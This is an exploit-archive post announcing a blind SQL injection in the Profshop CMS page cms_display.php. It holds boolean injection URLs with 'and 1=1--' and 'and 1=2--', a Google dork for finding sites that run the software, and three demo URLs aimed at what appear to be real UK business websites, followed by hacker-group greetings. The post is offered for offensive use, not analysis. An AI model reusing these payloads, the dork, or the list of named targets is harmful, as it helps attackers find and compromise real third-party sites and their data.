=================================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Indonesian Exploit Archive
Web : exploit-id.com
e-mail : root[at]exploit-id.com
#########################################
I'm Caddy-Dz , member of exploit-id.com
#########################################
================================================================================
####
# Exploit Title: Profshop (cms_display.php)<= Blind SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com | Caddy-Dz@exploit-id.com
# Category:: webapps
# Google Dork: intext:"powered by Profshop.co.uk"
# Tested on: [Windows Vista Edition Intégrale]
####
[*] ## ExPLo!T:
# http://127.0.0.1/cms_display.php?content_id=3+and+1=1-- [*] True
# http://127.0.0.1/cms_display.php?id=3+and+1=2-- [*] False
# http://127.0.0.1/cms_display.php?id=[SQLI] [*] Ev!L
###
[*] Demo :
http://www.cpupholstery.co.uk/cms_display.php?content_id=3+and+1=1--
http://www.goldlabeldirect.co.uk/cms_display.php?content_id=2+and+1=1--
http://www.pitbullfightwear.co.uk/cms_display.php?content_id=2+and+1=1--
###
[*] Peace From Algeria
###
=================================**Algerians Hackers**=======================================
# Greets To :
KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team , (exploit-id.com)
(1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer ,
MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================
